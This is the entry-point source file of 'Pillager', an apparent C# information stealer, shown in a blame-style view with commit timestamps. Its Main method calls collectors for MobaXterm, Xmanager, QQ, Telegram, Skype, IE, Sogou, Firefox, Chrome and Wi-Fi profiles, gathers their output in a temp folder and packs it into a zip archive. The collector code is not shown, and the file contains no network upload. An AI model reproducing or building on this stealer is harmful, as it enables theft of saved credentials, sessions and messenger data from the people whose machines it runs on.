Pillager/Pillager/Program.cs

46 lines
1.2 KiB
C#
Raw Normal View History

2023-04-23 16:22:43 -07:00
using System;
using System.Collections.Generic;
using System.IO;
2023-09-27 17:07:33 -07:00
using System.IO.Compression;
2023-04-24 08:38:01 -07:00
using Pillager.Browsers;
2023-10-26 00:37:40 -07:00
using Pillager.Messengers;
2023-10-26 03:32:09 -07:00
using Pillager.Others;
2023-10-26 00:37:40 -07:00
using Pillager.Tools;
2023-04-23 16:22:43 -07:00
namespace Pillager
{
internal class Program
{
static void Main(string[] args)
{
2023-06-20 01:09:56 -07:00
string savepath = Path.Combine(Path.GetTempPath(), "Pillager");
2023-09-27 17:07:33 -07:00
string savezippath = savepath + ".zip";
if (Directory.Exists(savepath)) Directory.Delete(savepath, true);
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
2023-04-24 08:38:01 -07:00
2023-10-26 00:37:40 -07:00
//Tools
MobaXterm.Save(savepath);
2023-11-06 08:28:58 -08:00
Xmanager.Save(savepath);
2023-10-26 00:37:40 -07:00
//Messengers
2023-10-15 12:02:06 -07:00
QQ.Save(savepath);
2023-10-07 04:09:27 -07:00
Telegram.Save(savepath);
2023-10-23 01:17:19 -07:00
Skype.Save(savepath);
2023-10-26 00:37:40 -07:00
//Browsers
2023-04-24 08:38:01 -07:00
IE.Save(savepath);
2023-10-25 08:09:29 -07:00
OldSogou.Save(savepath);//SogouExplorer < 12.x
2023-11-06 06:47:55 -08:00
FireFox.Save(savepath);
Chrome.Save(savepath);
2023-09-27 17:07:33 -07:00
2023-10-26 03:32:09 -07:00
//Others
Wifi.Save(savepath);
2023-09-27 17:07:33 -07:00
//ZIP
ZipFile.CreateFromDirectory(savepath, savezippath);
Directory.Delete(savepath, true);
2023-04-23 16:22:43 -07:00
}
}
}